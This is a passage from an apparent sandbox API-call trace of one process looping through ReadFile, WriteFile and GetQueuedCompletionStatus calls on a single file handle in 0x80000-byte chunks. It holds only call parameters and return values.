nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.002] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.003] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.005] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.005] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.007] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.008] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.010] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.010] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.020] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.022] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.023] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.023] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.029] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.030] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.032] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.061] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.062] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.064] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.064] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.065] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.067] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.068] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.068] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.078] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.080] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.081] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.081] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.087] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.089] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.090] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.090] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.144] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.146] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.147] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.147] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.149] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.150] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.152] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.152] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.161] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.163] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.164] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.164] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.170] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.171] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.173] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.173] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.199] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.201] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.202] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.202] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.204] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.205] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.206] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.206] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.216] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.217] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.219] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.219] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.227] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.228] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.230] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.230] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.270] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.271] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.273] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.273] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.274] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.276] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.277] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.277] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.286] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.288] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.289] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.289] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.291] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.294] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.295] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.295] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.339] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.340] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.341] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.342] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.343] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.344] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.346] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.346] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0139.356] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.357] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0139.359] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0139.359] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, 